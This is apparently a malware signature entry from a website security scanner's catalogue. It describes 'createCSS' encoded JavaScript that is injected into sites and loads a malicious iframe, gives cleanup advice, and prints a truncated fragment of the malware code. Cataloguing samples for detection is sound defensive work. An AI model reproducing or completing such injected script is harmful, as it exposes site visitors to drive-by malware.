SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjs612


Description: Encoded javascript included and used to distribute malware. It calls a malicious iframe once loaded. Also known as "HTTP Malicious Toolkit Variant Activity 12" or "createCSS" malware.

Domains used: (currently disabled)

Affecting: Any web site (no traffic specified)

Clean up: Malware is encoded, but a search / replace should fix it. Contact b></b if you have questions or want us to clean it up for you.

Malware dump:

function createCSS(selector , declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(uas))&&!(/opera/.test(uas))&&(/win/.test(uas));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";...

Full sample: